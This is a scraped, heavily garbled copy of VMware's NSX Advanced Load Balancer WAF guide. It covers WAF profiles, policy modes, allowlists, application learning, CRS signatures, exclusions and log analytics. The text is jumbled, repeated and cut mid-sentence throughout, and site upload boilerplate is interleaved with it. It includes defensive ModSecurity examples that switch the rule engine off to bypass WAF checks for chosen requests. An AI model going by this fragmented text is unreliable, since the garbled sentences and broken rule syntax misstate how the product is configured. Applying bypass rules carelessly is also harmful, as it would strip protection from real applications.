","It describes \"how does an attack look like\" which can be formulated as \"how the request should Vmware NSX Waf - Guide Vmware NSX Waf - Guide You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ VMware, Inc. © VMware, Inc. 2 1 Overview 5 2 Configuring WAF 7 VMware, Inc. 3 5 FAQ's 83 VMware, Inc. 4 Web application firewalls (WAFs) are intended to protect businesses from web app attacks and Traditional web application security solutions do not provide visibility and security insights that NSX Advanced Load Balancer leverages software-defined architecture and its strategic location NSX Advanced Load Balancer WAF plays an integral role in a defense-in-depth strategy that Architecture VMware, Inc. 5 VMware, Inc. 6 n WAF Profile n WAF Policy n Allowlist WAF Profile A WAF profile contains the basic settings for WAF functionality and is attached to a WAF Policy. n Application Java Profile: This profile contains all the necessary elements for any Java n Application PHP Profile: This profile contains all necessary elements for any PHP applications. VMware, Inc. 7 Note n System-WAF-Profile is the default profile that contains most commonly used web application n For customizing a profile, it is highly recommended to create a new profile instead of editing Settings Tab Allowed Versions Enter the allowed HTTP versions for 1.0, 1.1, 20.x and 2.0 are the default Allowed Methods Enter the allowed HTTP method for Websites might use only the default Allowed Content Types Enter the accepted request content Default entry covers all standard Restricted Extensions Enter extensions that should be Generally, these are files that do not VMware, Inc. 8 Static Extensions Enter the list of static file extensions A GET request without any Default Actions Request Header, Request Body, Phase: The Allowed values along with 1 Select the WAF allowed HTTP versions in the field Allowed Versions. By default, 1.0, 1.1, 2.0 2 Select the WAF allowed HTTP methods, as required. By default GET, HEAD, POST, OPTIONS 3 Select the WAF allowed content types to restrict the content types that are accepted. By 4 Under Restricted Extensions enter WAF restricted file extensions to restrict access by 5 Under Restricted Headers enter WAF restricted headers to be blocked. By default, it covers 6 Enter the list of static file extensions that should bypass the WAF check in the field Static The General section in the New WAF Profile screen is as shown below: VMware, Inc. 9 Other Settings Maximum backend response size Enter the maximum response size in Example - 128 Regex Match Limit This is the Limit for CPU utilization for Example - 30000 Max Execution Time This is the maximum time allowed for Example - 50 Cookie Format Versions Select the preferred cookie format Version 1 cookies have been XXE Protection Block or flag XML requests referring Check/Uncheck the Checkbox. VMware, Inc. 10 VMware, Inc. 11 Files Tab 2 Scroll down to the bottom of the page and click on + Add File. These files can be referred in the custom WAF policy rules. For more information refer to Custom WAF Policy WAF policy is a specific set of rules that protects the application. This policy is enabled by Note n System-WAF-Policy is the default policy in NSX Advanced Load Balancer which contains n For customizing a policy, it is highly recommended to create a new policy instead of editing n WAF policies that enable Application Learning cannot be shared between Applications. VMware, Inc. 12 2 Click on Create. Note Create will clone the System-WAF-Policy and use it as the basis for the already a Settings b Learning c Allowlist d Positive Security e Application Rules f Signatures VMware, Inc. 13 Settings Tab WAF Profile Choose the WAF profile that should WAF Profile Paranoia Level Set the paranoia level for the WAF Paranoia Mode VMware, Inc. 14 Note IPv6 is not supported for WAF as yet in NSX Advanced Load Balancer WAF Mode Detection only and enforcement are the two modes supported for a WAF policy in NSX Policy Logs alerts during an attack, but no Rejects requests when a policy is Operation Evaluates the whole policy without Matches the first rule that rejects the VMware, Inc. 15 Log files Contains the WAF log section where Contains specific WAF log section Application Learning enables the WAF feature on NSX Advanced Load Balancer in order to When the Application Learning is enabled on a virtual service, the Service Engine collects data It parses all paths containing URI or BODY parameters of an HTTP request. This collection Learning option VMware, Inc. 16 n Enable the App Learning for the selected WAF policy. Once the option is enabled, the Enable Auto Rule Updates Enable Application Learning based Check/Uncheck the Checkbox. Learning Interval Frequency with which SE publishes Range (1 to 60 min). Example- 30 min Max Parameters Maximum number of params to learn Range (10 to 1000). Example- 100 VMware, Inc. 17 Min Hits to Learn Minimum number of occurances Range (10 to 1000). Example- 100 Per URI Learning Learn the params per URI path. Check/Uncheck the Checkbox. Note If the Per URI Learning is ENABLED, the learning algorithm will program URI and param Starting with NSX Advanced Load Balancer release 20.1.1, Adaptive Application Learning is In the Adaptive Application Learning, the manual modification of sampling percentage and To improve user experience and optimize resource usage while maximizing the application For effective Adaptive Application Learning, the followings parameters are continuously adjusted n Sampling Percentage n Learning Interval For more information and recommendation on these parameters, refer to the below sections. Sampling Percentage The sampling rate controls the frequency of the Service Engine collecting data while Analyzing If the value of sampling frequency is set to 50%, the Service Engine will only collect 50% of the VMware, Inc. 18 It is recommended to use the sampling percentage of 100% in the initial phase of Application Using a lower sampling rate conserve SE resources when no new data is available for learning. The NSX Advanced Load Balancer Controller sends the adjusted sampling percent (reduced) to To enable Adaptive learning, use the configuration knob enable_adaptive_config available under In the Adaptive Application Learning, when the new type of traffic is received by SEs, the NSX The option to set Sampling Percentage is available under the App Learning tab of WAF policy. To change the sampling percentage for the incoming request for a WAF policy. 3 The value for this parameter can be set to any value between 1 and 100. VMware, Inc. 19 Learning Interval Learning interval is the time period or duration, after which the Service Engine sends data related VMware, Inc. 20 Allowlist Examples oder n The request matches the URL pattern specified using the HTTP Method match type. Use cases n A security scanner that scans the application directly bypassing WAF protection. n Do not check special parts of the URL space, for example “/upload/*”. 1 From the NSX ALB UI, navigate to Templates > WAF > WAF Policy. VMware, Inc. 21 6 In the New Allowlist Rule screen, enter the details as shown below: Field Description Field Description VMware, Inc. 22 Field Description VMware, Inc. 23 VMware, Inc. 24 6. Click on Save Match Type Client IP 4 Either select Custom Value and enter the IP Addresses manually or select Internal. Note This client IP match type supports IP Groups. For more information refer to IP Group HTTP Method VMware, Inc. 25 1 Select the match type as HTTP Method under Add Match Type. Path Host Header 1 Select the match type as Host Header under Add Match Type VMware, Inc. 26 Sampling feature is used to enhance allowlist feature for the WAF traffic exposing only a If the request is in the sampling range, the configured action is applied to the request. For Examples n Sampling percentage: 10 n Action: CONTINUE For all traffic whose client IP address is 1.2.3.4, 10% of them will run action CONTINUE(executing Example 2 If the requirement is to subject 10% of traffic from a specific subnet other than the particular URI n Rule : !x.x.x.x/x n Action: allow n Rule: uri_path n Action: allow n Rule: All n Sampling percentage: 90 VMware, Inc. 27 n Action: allow The request, which misses the above rules, will continue with WAF. Prior to the NSX Advanced Load Balancer release 20.1.3, only full buffering for POST payloads Starting with NSX Advanced Load Balancer 20.1.3, partial buffering for chunked-encoded payload Prior to NSX Advanced Load Balancer release 20.1.3, only ranges, prefixes or lists of IP addresses Procedure 1 To configure an IP group: b Use the Select by IP Address option and add the required IP address. VMware, Inc. 28 2 Select the IP group created in the previous step as the value for the Match option while VMware, Inc. 29 3 Select the desired action and save the WAF allowlist, as shown below. VMware, Inc. 30 4 The following shows a complete WAF policy using IP group. As shown below, action is set as Positive Security rules define allowed application behaviour. These rules can be created by the Both Positive Security and Signatures allow similar concepts for rules. n Enable / Disable n Positive Security policy can result in better performance. Instead of checking a value against VMware, Inc. 31 Procedure 1 From the NSX ALB UI, navigate to Templates > WAF > WAF Policy. 5 Click on Add Group to create the New Positive Security Group. Click on the Three dots 6 In the New Positive Security Group screen, enter the details as shown below: VMware, Inc. 32 Hit Action Select either Allow parameter or If a rule in this group matches the Miss Action Select either Block or No Operation If a rule in this group does not 7 Click on Save. Creating a Location Procedure 4 In the Criteria field, select the Criterion to use for matching the HTTP request in the URI. VMware, Inc. 33 7 To add another match type, select one from the Add Match Type drop-down list. 8 Click on Add Rule to create a new rule. The New Location screen is shown as below: 9 Click on Save. VMware, Inc. 34 Procedure 1 Click on the Rule Enabled toggle button to enable/disable the rule. The rule is enabled by 5 Select a mode: a Use Policy Mode: When Detection or Enforcement can not be applied, the policy mode is b Detection: WAF rules will be processed but HTTP transactions will not be intercepted. c Enforcement Mode: WAF rules are processed and HTTP transactions intercepted, as per 6 WAF Ruleset paranoia mode is available to select Rules based on the paranoia-level. Creating a Enter the Value Max Length to define the maximum length of the match value. b Enter a Match Value Pattern to identify the expression which describes the expected c Enable Arguments Case Sensitive, if required. This will ensure the match value has the VMware, Inc. 35 8 Click on Add Match Element and define the match elements as shown below: c Click on Excluded, if required. Use this option to Exclude, the element mentioned under VMware, Inc. 36 9 Click on Save. VMware, Inc. 37 n 2- Medium n 3- High n 4- Extreme Two aspects that should be considered while setting the paranoia mode are: The following table maps paranoia modes to different risks levels and resource availability. For more information on paranoia mode, refer to OWASP CRS Paranoia Mode. n String Group – UUID of the string group containing key used in the match element. 1 Navigate to Templates > WAF > WAF Policy > Positive Security tab. 2 The option to use string groups is available under Match Elements while creating a New VMware, Inc. 38 3 For the string group, select the default System-PSMGroup-Types from the drop-down or 4 For the default System-PSMGroup-Types, select one of the KEY NAMES as shown below. VMware, Inc. 39 5 To create a new string group, select create from the drop-down as shown below. VMware, Inc. 40 6 Provide the name, enable the checkbox for Key Value Pair. 7 Provide the name of new key and enter a PCRE supported expression under the Value field, VMware, Inc. 41 8 Provide the name of the key created in the previous step as shown below. VMware, Inc. 42 Note The maximum value of the string groups that NSX Advanced Load Balancer supports is n The NSX Advanced Load Balancer WAF protects web applications from common n WAF Signatures are published (Core Rule Set) every quarter using a controlled release n Once the WAF signatures are published, it is available on NSX Advanced Load Balancer Pulse VMware, Inc. 43 You can deploy latest WAF signature data on to the Controller available for applications to utilize The following are the two ways to deploy WAF signature data on the Controller: n Automated n Manual Automated deployment of WAF signatures gets enabled only when it is explicitly opted in from n Automated workflow gets enabled once WAF signature service is opted in. VMware, Inc. 44 If you have not opted-in for auto deployment of WAF signature data on to the Controller, the 1 You can click on this link to download the WAF signature data file on to the local system. 2 You need to upload the same file to the Controller manually by following the below: VMware, Inc. 45 If the CRS version is updated, all new CRS rules will be in Detection mode. With this, you can All updated rules will continue to remain in the same mode and the existing exclusions will be 1 Under the Signatures tab, scroll down to the CRS Rules section. VMware, Inc. 46 3 The change log is displayed as shown below. Click on OK to confirm and update the CRS VMware, Inc. 47 Pre-CRS Rules The custom rules that are applied before the supplied OWASP Core Rule Set (CRS) are called 1 From the NSX ALB UI, navigate to Templates > WAF > WAF Policy. VMware, Inc. 48 9 Select a mode: a Policy Mode: When Detection or Enforcement cannot be applied, the policy mode is b Detection: WAF rules will be processed but HTTP transactions will not be intercepted. c Enforcement Mode:WAF rules are processed and HTTP transactions intercepted, as per VMware, Inc. 49 11 Click on the Create Group button. The Pre-CRS rule is listed as shown below: Exceptions VMware, Inc. 50 These are normally created when an application’s regular traffic matches specific WAF rules. The n For applications transmitting data that might appear like an attack. For instance, transferring n For applications with special requirements that are not allowed in the policy. For instance, n You can use NSX Advanced Load Balancer’s recommendation system to create exceptions or 1 Click on +Add Exception to manually configure exceptions. For more information refer to 2 Configure exceptions for IP address/subnet, path, or any match element. For example, 3 Configure the following options for Path and Match Element, as required: a Case Sensitive - The case of the characters have to match to create an exceptionii) b Regex Match - The pattern of the string of characters should match to create an VMware, Inc. 51 This is another example where if there is match element like say ARGS:xyz, a request matching the VMware, Inc. 52 Here, the rule is processed, but the parameter ARGS:xyz is not used in running the rule. a False-positives may occur in large numbers and for different client IP addresses. b To understand the context for false-positives, consult the application owner if possible. 2 In the log, choose the WAF hit entry that you want to add the exception for, and click on + b These values are pre-computed from the log entry and related findings. VMware, Inc. 53 Post-CRS Rules 1 Under the Signatures tab, scroll down to the Post-CRS Rules section. 3 Click on Save. With Mode Delegation option on NSX Advanced Load Balancer , the policies can be enabled to n Detection n Enforcement n Mode Delegation While in Detection mode, if a request matches a rule, then the request is flagged with an While in Enforcement mode, if a request matches a rule it is blocked by the NSX Advanced Load With Mode Delegation, WAF rules can overwrite the policy mode, where specific action can be Use Cases 1 Test new rules – You can configure manually written rules or new CRS rule updates with VMware, Inc. 54 2 Partial detection – You can configure a few rules in enforcement mode, while still retaining 3 In the Settings tab, under Policy Mode, click on the checkbox for Allow Mode Delegation to VMware, Inc. 55 VMware, Inc. 56 n Creating Exclusions n Importing the CRS files and CRS Update from NSX Advanced Load Balancer Portal n Custom Rules Creating Exclusions Overview For most of the IPs, in case a violation is flagged then, it is a false positive. However, if a violation Exclusions in WAF Exclusions includes tuning a policy to work with an application. Exclusions are generated when 2 The application transmits data that resembles an attack to the WAF. For example, VMware, Inc. 57 3 The application has special requirements that are not allowed in the policy. For example, Note False-positives may occur in large numbers for different client IP addresses. 3 Exceptions can be created either in a group level or in a rule level. The exceptions created Creating Exceptions Procedure 1 From the NSX ALB UI, navigate to Applications > Virtual Services. 2 Click on the Virtual Service mapped to the WAF policy and navigate to Logs. 3 Filter the WAF log analytics . You can analyse the WAF log analytics based on parameters 5 Click on +Add Group Exceptionsor +Add Rule Exception to create an exception for a false- Alternatively, exceptions can be manually defined for a group or a rule within the WAF policy. VMware, Inc. 58 3 Scanning the App log analytics shows requests from many IPs that got blocked because of 4 Clicking on the offending parameter opens Analytics and it shows that this ARGS:img had n 5 Admin identifies this as a standard functionality within the application (may ask Dev team). 7 Admin chooses one of the suggestions: "exclude parameter", "exclude IP" and more "exclude 8 New exclusion is put in place (NONE, "foo/bar_form.php", ARGS:img) in front of XSS rule group. Multiple CRS versions are supported in NSX Advanced Load Balancer. The NSX ALB only Procedure VMware, Inc. 59 2 Navigate to Software > CRS. Different versions of CRS files are listed as shown below: VMware, Inc. 60 4 The CRS Details screen lists the Name, Version, Release Date of the CRS file and more as 6 The downloaded file is available on your system. This can now be uploaded into NSX Procedure VMware, Inc. 61 3 Click on Open. You can configure to execute custom rules before CRS or after CRS as well. For more information refer to configuring Pre-CRS Rules and Post-CRS Rules Custom Rules WAF supports custom rules that can be added for any application specific use cases or any other Custom rules can be configured and executed Pre-CRS and Post-CRS. For more information, refer Bypassing WAF SecRule'Variable"value"'"phase:1,id:4000100,nolog,pass,ctl:ruleEngine=off" Example In this example, if the value of the content-length header is greater than 1048576, then the rule Example VMware, Inc. 62 In this example, if the form of encoding used to transfer is chunked, then the request skips WAF. SecRule'Variable“@value”';jsessionid=""id:4000102,phase:1,t:none,pass,ctl:ruleEngine=off" Example In this example, any request that begins with the string “/IDMProv/login.do” will bypass WAF. Allowlisting Requests Example In this example, all requests from 10.0.0.0/8 to all URL’s starting with “/admin” are whitelisted. VMware, Inc. 63 Example SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* In this example: Keyword = document.cookieRemove document.cookie from the xss-keywords data file and send the DVWA Note Alternatively, to leave it in place, remove the exceptions / enable the rules above and Example VMware, Inc. 64 Example In this example, the allowed HTTP methods are GET HEAD POST PUT OPTIONS DELETE PATCH . Note You can overwrite the list of methods in the pre CRS rules of WAF policy, if needed. VMware, Inc. 65 VMware, Inc. 66 {tx.critical_anomaly_score}’,\ setvar:’tx.sql_injection_score=+%{tx.critical_anomaly_score}’,\ NSX Advanced Load Balancer provides a script called avi-iwaf-vpatch.py that imports a DAST The supported scanner format is an XML file containing scanner result report. Workflow 2 If you find any issues, the avi-iwaf-vpatch.py uses the output of the scan to generate WAF 3 Scan again. The subsequent scans will not report issues for problems handled by WAF Policy. The avi-iwaf-vpatch.py generates NSX Advanced Load Balancer WAF Policy Positive Security Note The avi-iwaf-vpatch.py does not generate rules to protect from all the potential issues The script is delivered as part of NSX SDK, available on NSX Advanced Load Balance Controller VMware, Inc. 67 Usage n -p — password n -t — tenant n -v — verbose output When you run the script without -foption, the system will only print what it would do. Only after Example DAST scanners can report multiple issues that are not handled by the avi-iwaf-vpatch.py script. 2 In NSX admin UI, navigate to Virtualservice/Policies/HTTP Response action and select Add 3 Issues related to cookies can be like “A cookie has been set without the HttpOnly flag” or VMware, Inc. 68 WAF Policy can be configured to operate in either detection only or in enforcement mode by Anomaly Scoring Within the Service Engine, by default, multiple thresholds are set and can be changed. Default thresholds setvar:tx.sql_injection_score_threshold=15, setvar:tx.critical_anomaly_score=5, When the WAF policy is executed, rules that match are adding to their match value to the setvar:tx.anomaly_score=+%{tx.critical_anomaly_score} setvar:tx.rfi_score=+%{tx.critical_anomaly_score} Finally, when all rules are evaluated, the rule 949110 - inbound anomaly score will check the VMware, Inc. 69 setvar:tx.inbound_tx_msg=%{tx.msg}, 3 Click on Logs. Note A rule can have different disruptive actions. Most of the rules use block as the disruptive Therefore, the new default action needs to be pass. It needs to be changed for all phases of the 1 From the NSX ALB UI, navigate to Templates > WAF > WAF Profile. VMware, Inc. 70 3 Modify the Default Actions in the Edit WAF Profile screen as shown below: Note It is recommended to disable the CRS rule 949110, which denies the request on the overall This rule blocks only on the tx.rfi_score_threshold and the accumulated tx.rfi_score variable. Caveat Note Within ModSecurity language, the variable (for example, TX:RFI_SCORE) to be written with a In the Actions list and in the Operator, it is written using a . (dot). (For example, tx.rfi_score) If VMware, Inc. 71 This will trigger 931120. Check for Remote File Inclusion (3/4) as shown below: VMware, Inc. 72 n WAF Logs n WAF Metrics n WAF Analytics n WAF Metrics When a WAF policy is attached to a virtual service, a specific WAF logs are generated. To view 3 The logs can be filtered to view specific WAF entries. Type WAF on the search bar to VMware, Inc. 73 n WAF: Result of WAF evaluation. For more details, refer to the WAF Status section. WAF Status n FLAGGED: Policy is in detection only mode and the request was logged, but not rejected. n BYPASSED: When the request matches with the Allowlist and the Allowlist handles the request. VMware, Inc. 74 Note This is the first indicator of a matched WAF policy and does not indicate if the request was n WAF response time: Displays the execution time for all four WAF evaluation phases. n WAF Hits : Displays the rules that were matched. All rules that were matched will have an n Group name n Rule name n Rule ID n Rule message n Part of the request or response that was matched, along with the offending string n Match phase VMware, Inc. 75 n Add Exceptions: Under the WAF Hits section, click on + Add Exceptions, to create an n Exceptions can be created either at a group or a rule level. The exceptions created will be WAF Analytics 3 Navigate to Logs and click right side panel to access Log Analytics. The Log Analytics tab provides an option for WAF analytics under the following sections: n WAF Tags n WAF Rules n WAF Groups n WAF Latency Each section provides an insight into the currently filtered traffic. Analytics can be generated VMware, Inc. 76 The following screenshot shows a sample of logs displayed on choosing FLAGGED WAF status WAF Tags WAF Rules VMware, Inc. 77 WAF Groups VMware, Inc. 78 WAF Latency WAF Metrics 2 Click on the Virtual Service mapped to the WAF policy and navigate to WAF. The chart in this tab displays WAF rule hits against the chosen time frame. This helps analyze VMware, Inc. 79 The following fields show specific hit counts for each listed element: n Group n Rule n Tag n Client IP n Path n Match Element All elements in each field are displayed with the corresponding hit count. On discovering a false You can click on any element in each field to create a specific filter. Then, the field Popular Preview Exceptions On choosing a specific filter under Client IP, Path, and Match Element, you can add an exception 2 To add this exception, click on the Add Exceptionsicon. The policy will be updated Note For previewing and creating exceptions, ensure that the required rule is selected as a part For instance, clicking onARGS:ip under Match Element, provides a preview exception option as You could choose multiple field elements to create a more specific exception entry. VMware, Inc. 80 Preview Logs 1 You can filter preview logs for a particular combination by clicking on the Preview Logs 2 In the below example, the grayed out elements in the screenshot represents the filter 3 Click the Preview Logs button to view a log table as shown below. VMware, Inc. 81 VMware, Inc. 82 n Automation: WAF solution that can be driven by any of the current automation frameworks n Observability: WAF solution that provides deep insights into the traffic, application behaviour n Scalability: WAF solution that caters to small and large applications in a similar manner. n Performance: WAF solution that uses the resources to the best effort and provides n Real-time Insights VMware, Inc. 83 n DDoS Protection n L3/L4 ACLs n L7 Rules/Policies etc. Example: product_id=[0-9]{0..63} The Positive Security Model describes the configuration which informs WAF about "how the VMware, Inc. 84 It describes "how does an attack look like" which can be formulated as "how the request should What is Allowlisting? What is Learning? 1 First, for an incoming request, the Allowlist policies are checked. If there is any matching 2 In case none of the conditions match then, the positive security engine checks if the request 4 If Positive Security marks the request as legitimate then, the request is sent to the Signature 5 If WAF finds an attack vector then, it blocks the request. If not,the request is passed. 7 If WAF is in Detection mode then, it flags the requests but does not block them. VMware, Inc. 85 VMware, Inc. 86
not look like\".","What is Allowlisting?
The component \"Allowlist\" ensures if a request should either be checked or not by the WAF. For
example: the customers may prefer to bypass WAF for all POST requests to /upload.php.","What is Learning?
In a system, Learning is a method of collecting statistical information of an application's normal
usage in order to generate a \"Positive Security Model\".","What is WAF processing flow ?","The WAF processing flow is as follows:","1 First, for an incoming request, the Allowlist policies are checked. If there is any matching
condition then, the request is whitelisted i.e., WAF processing is turned off for that request.","2 In case none of the conditions match then, the positive security engine checks if the request
is in line with the learnt data.","3 If a request is marked as illegitimate by the positive security engine then, it is flagged/blocked"," immediately.","4 If Positive Security marks the request as legitimate then, the request is sent to the Signature
engine which verifies by matching parts of the request against a valid signature in order to
identify the attack vector.","5 If WAF finds an attack vector then, it blocks the request. If not,the request is passed.","6 If WAF is in Enforcement mode then, it block the requests.","7 If WAF is in Detection mode then, it flags the requests but does not block them.","What is False Positive ?","Sometimes a legitimate request is flagged as an attack. This may affect the business and also","develop fear among customers.","VMware, Inc. 85
\fVMware NSX Advanced Load Balancer WAF Guide","What is False negative ?","When an attack is not detected it is called as False negative. This affects the security but not the","business (in the perception of the user). However, the site continues to work.","What is an exclusion for false positive mitigation ?","An exclusion adds a matching condition of Uploaded by
muhammadulya a Original Title
Copyright
Available Formats
Share this document
Did you find this document useful?
Is this content inappropriate?
Copyright:
Available Formats
Uploaded by
muhammadulya a Copyright:
Available Formats
VMware NSX Advanced
Load Balancer WAF Guide
VMware NSX Advanced Load Balancer 20.1.5
VMware NSX Advanced Load Balancer 20.1.5
VMware NSX Advanced Load Balancer WAF Guide
3401 Hillview Ave.
Palo Alto, CA 94304
www.vmware.com
Copyright 2021 VMware, Inc. All rights reserved. Copyright and trademark information.
Contents
WAF Profile 7
Configuring WAF Profile 8
WAF Policy 12
Configuring WAF Policy 12
WAF Mode 15
Application Learning for WAF 16
Allowlist 21
Configuring Allowlist Rules 21
Sampling Traffic to WAF Allowlist 27
Partial Buffering for Chuncked Mode Encoding 28
Support for IP Groups in Allowlist 28
Positive Security and Learning 31
Configuring Positive Security Group 31
Deploying WAF Signatures 43
Signatures CRS rules 46
Pre-CRS Rules 48
Post-CRS Rules 54
Mixed Mode and Enabling Mode Delegation 54 3 Best Practices for working with WAF 57
Creating Exclusions 57
Exclusions in WAF 57
Creating Exceptions 58
Examples for Creating Exclusions 58
Importing the CRS files and CRS Update from NSX Advanced Load Balancer Portal 59
Download the CRS File 59
Upload the CRS File 61
Custom Rules 62
Custom Rules Examples 62
Vulnerability Scanner (DAST) 67
Workflow 67
Limitations DAST scanner integration 68
WAF in Anomaly Score Mode 68
Anomaly Scoring 69
Setting Up WAF in Anomaly Scoring mode 70
VMware NSX Advanced Load Balancer WAF Guide 4 Analytics and Insights 73
WAF Log Analytics 73
Analyzing WAF Logs Analytics 74
WAF Analytics 76
WAF Metrics 79
Preview Exceptions 80
Preview Logs 81
Overview
1
This section explains about NSX Advanced Load Balancer Web Application Firewall
proactively prevent threats.
administrators can use to create an effective application security posture. Enterprises need real-
time visibility into application traffic, user experience, security and threat landscape, and
application performance to identify and protect against the most sophisticated attacks.
on the network to gain real-time application insights. The built-in WAF solution provides
application security and networking teams with an elastic and analytics-driven solution that
scales and simplifies policy customization and administration through central management.
does comprehensive threat analysis, mitigates risk, provides zero-day protection against
unpublished exploits and optimizes application security.
NSX Advanced Load Balancer WAF is built on the core design principles shown below to ensure
that WAF is a simple yet comprehensive security solution.
VMware NSX Advanced Load Balancer WAF Guide
Configuring WAF
2
This section discusses Web Application Firewall (WAF) configuration on NSX Advanced Load
BalancerThis chapter includes the following topics:
n Positive Security and Learning
n Deploying WAF Signatures
n Mixed Mode and Enabling Mode Delegation
This section explains the WAF Profile feature on NSX Advanced Load Balancer
As the WAF profile is independent of the policy and it is defined for a specific set of virtual
services. Therefore, it can be easily reused to a feasible extent.Few examples for WAF Profiles are as given below:
applications.n API Profile: This profile contains API specific settings.
VMware NSX Advanced Load Balancer WAF GuideConfiguring WAF Profile
This section discusses the configuring WAF Profile
n Navigate to Templates > WAF > WAF Profile to locate the default profile.
settings served through a virtual service.
the default profile (System-WAF-Profile).To create a new profile follow the below:
1 Navigate to Templates > WAF > WAF Profile.
2 Click on Create icon.
Provide the following details to configure the WAF profile: Field Description Additional Information
Name Enter a relevant name for the profile.
the profile. entries.
the profile. Different applications HTTP methods i.e. GET, HEAD, POST,
might need different methods. OPTIONS. APIs might use other HTTP
methods such as PUT, DELETE,
TRACE, CONNECT etc.
You can also choose from the
additional options provided below:
n PATCH
n PROPFIND
n PROPPATCH
n MKCOL
n COPY
n MOVE
n LOCK
n UNLOCK
types for the profile. content types.
restricted and blocked. reside on a web server. Restricted Headers Enter headers that will not be allowed
by WAF.
VMware NSX Advanced Load Balancer WAF Guide Field Description Additional Information
that will bypass the WAF check. parameter or dynamic part is
classified as a static request. It does
not contain any attack vector.
Response Header, and Response the description for each phase are as
Body are the four WAF phases. Each given below:
of this phase has a default action. The phase:1 - Request Header phase
fields defined for this default action phase:2 - Request Body phase
are phase,action,status
phase:3 - Response Header phase
code,additional logging,WAF logs
phase:4 - Response Body phase.
Example- phase:1
action: Two options are permit and
deny. Example- deny
status code: In case the request is
denied by WAF then, by default a
403 status code is sent to the client.
However, the status code can be
customised (if required). Example-
status:403
additional logging: Enter the
additional logging level. Example- log
WAF logs: Enter the WAF logging
level.
Example- auditlogTo configure the General Settings, follow the below:
are selected.
are selected.
default, standard content types are covered. Note The other content types can be added easily.
blocking. By default, it covers most use-cases.
most use-cases.
Extensions.
VMware NSX Advanced Load Balancer WAF Guide
Maximum client request size This is the maximum size for the client Example - 32
request body scanned by WAF.
KB allowed by WAF. Argument Separator Enter the separator for specical Example - &
applications that have different
argument separators.
each regular expression match when
the processing rules.
WAF processing for a single request.
version. deprecated. Therfore, Netscape
cookies are recommended.
to External Entities.The following screenshot displays a sample configuration:
VMware NSX Advanced Load Balancer WAF Guide
VMware NSX Advanced Load Balancer WAF Guide
The static input data in a WAF profile that is shared between virtual services is stored here. For
instance, the file name sql-errors.data has the default data set which contains strings for
examining HTTP responses for data leakage protection.To create a new file, follow the below :
1 Go to the File Tab.
3 Provide a Name and enter the relevant Data.
Rules
This section discusses the WAF Policy on NSX Advanced Load Balancer
associating it with a virtual service.Configuring WAF Policy
This section discusses how to configure WAF policy
n Navigate to Templates > WAF > WAF Policy to locate the default policy.
OWASP CRS rules. For more information refer Signatures CRS rules
the default policy (System-WAF-Policy).
VMware NSX Advanced Load Balancer WAF GuideTo create a New Policy, do the follow:
1 Navigate to Templates > WAF > WAF Policy.
created WAF Policy.3 Configure the new WAF policy under the following tabs:
4 Click on Save button to create the WAF policy.
VMware NSX Advanced Load Balancer WAF Guide
Provide the following details to configure the WAF policy: Field Description Additional Information
Name Enter a relevant name for the policy.
be attached to this policy. The profile
contains common reusable settings
that complement the WAF policy. Mode Click on the required mode. The It is recommended to use detection
supported modes are: only mode when onboarding a new
n Detection — In this mode, WAF Application. For more details, refer to
policy will evaluate the incoming WAF Mode
request. A log entry of type For more information on Mode
(WAF type) FLAG is created, delegation, refer to Mixed Mode and
when the request is FLAGGED. Enabling Mode Delegation
n Enforcement — In this mode,
WAF policy will evaluate and
block the request based on the
defined default action. This
default action is configured in the
WAF profile. If any action is
rejected, there will be a
corresponding log entry named
as REJECTED.
n Mode delegation — In this mode,
WAF rules can overwrite the
policy, where specific action
(detection or enforcement) can
be defined for a single rule,
irrespective of the action defined
for the rule set.
policy. This is used to determine the
rigidity of the policy and has a direct
impact on potential false positive
rate.The below screenshot displays a sample configuration:
VMware NSX Advanced Load Balancer WAF Guide
The following section discusses the differences between these two modes.
Advanced Load Balancer. Every policy runs in one of these modes to evaluate the requests and
responses. Detection Only Enforcement
deny action is taken. matched and deny action is taken.
stopping at the first rule hit. request and implements the default
action or returns a rule specific error
code.
VMware NSX Advanced Load Balancer WAF Guide Detection Only Enforcement
the policy violation was found and which has the first rule that rejected
entries for every rule that is matched. the request. Note This is to improve
performance. If a request is already
detected as an attack, further checks
are not required. Response Code 200 OK Default is 403 Forbidden. This
response code can be modified.Application Learning for WAF
This section discusses Application Learning for WAF
analyze a set of incoming traffic processed by the WAF Policy.
and sends it to the Controller for Analysis. Therefore, all Learning takes place on the Controller.
The traffic selection for Application Learning is based on the WAF policy configured.
continues during a specified duration or time interval. Once the timer is hit, the Service Engine
sends the data to the NSX Advanced Load Balancer Controller for analysis. These WAF
configuration parameters are distributed across WAF policies.
To enable the Learning option, follow the below:n Navigate to Template > WAF > WAF Policy.
n Select the policy for which App Learning should be enabled.
The below screenshot exhibits the option to enable App Learning :
VMware NSX Advanced Load Balancer WAF Guide
additional configuration options will be available to edit as below: Field Description Additional Information
Sampling Percent of the requests subjected to Range (1 to 100%).
Application learning.
rule updates on the WAF Profile.
Rules will be programmed in
dedicated WAF learning group. Auto Promote Rules w/ Confidence Minimum confidence label required Low
for auto rule updates. Probable
Hoch
Very High (99.99 -100%)
Application learning data to
controller.
for an application.
VMware NSX Advanced Load Balancer WAF Guide Field Description Additional Information
required for a Param to qualify for
learning. Max URI Maximum number of URI paths to Range (10 -10000).
learn for an application. This value
can be set higher for more complex
applications.
combinations when they reach the confidence score. If DISABLED the learning algortihm will
program params independently from the URI. This can be useful when URIs are generated for
each session.Adaptive Application Learning
This section explains Adaptive Application Learning
supported. In Adaptive Application Learning, the Controller takes control of adjusting these WAF
Learning parameters for the effective Application Learning while the SE just enforces it.
learning interval is not required.
learning progress, a feedback system is created that tunes these parameters once learning is
enabled on an application. Using Positive Security Model (PSM) with Application learning enables
the end-user to automate the configuration changes.
by the Controller:
For a WAF policy, sampling is assigning a percentage of the incoming requests to participate in
the Application Learning process.
happens in the Controller.
incoming requests or every alternate request.
VMware NSX Advanced Load Balancer WAF Guide
Learning. This helps in collecting the fastest data aggregation, and efficient application learning.
When learning is in progress, the URI information is sent to NSX Advanced Load Balancer
Controller tend to peak or fall.
the SEs. After the sampling, The SEs have to inspect or evaluate only a small percentage of the
incoming traffic. The maximum sampling percent for the application learning is set to 100%, the
minimum percentage can be set as 1%.
the analytics profile.By default, the value of the enable_adaptive_config parameter is set to true.
Advanced Load Balancer Controller changes the sampling rate for the learning.1 Navigate to Template > WAF > WAF Policy
2 Click on Learning Tab as shown below.
